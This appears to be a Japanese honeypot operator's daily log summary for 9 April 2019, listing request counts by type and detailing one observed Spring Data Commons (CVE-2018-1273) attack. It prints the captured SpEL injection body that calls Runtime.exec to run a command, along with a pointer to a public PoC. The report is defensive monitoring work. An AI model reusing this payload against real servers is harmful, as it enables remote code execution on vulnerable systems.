BW-Potのログ分析 (2019/04/09)
本日の総アクセス件数は614件です。送信元IP数は81IPです。
・Spring Data Commonsの脆弱性(CVE-2018-1273)に関する攻撃を観測しました。
同様の通信は2019 4/1にも観測していますが、詳細が分かったため、記載します。
・ヘッダ
POST /users?page=&size=5
・ボディ
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/su")]=&password=&repeatedPassword=
以下のサイトにPoCが公開されており、pathが一致しているため、
PoCを用いた調査行為だと思われます。
VulApps/s/spring/2 at master · Medicean/VulApps · GitHub
件数 | 種別 | リクエスト |
381 | アクセス | GET / |
207 | phpMyAdminに関する攻撃 | POST /phpmyadmin/ |
6 | FreePBXに関する調査 | GET /admin/assets/js/views/login.js |
4 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
2 | 不正中継の調査 | GET api.binance[.]com/api/v1/time |
2 | クローリング | HEAD /robots.txt |
2 | 不明 | GET /script |
2 | 不明 | GET /version |
1 | SSL証明書発行時の一時ファイルの調査 | GET /.well-known/security.txt |
1 | WordPressに関する調査 | GET /cms/wp-login.php |
1 | WordPressに関する調査 | GET /cms1/wp-login.php |
1 | アクセス | GET /favicon.ico |
1 | クローリング | GET /robots.txt |
1 | 不明 | GET /server.js |
1 | サイトの構成調査 | GET /sitemap.xml |
1 | Spring Data Commonsの脆弱性(CVE-2018-1273)に関する攻撃 | POST /users?page=&size=5 |
参考サイト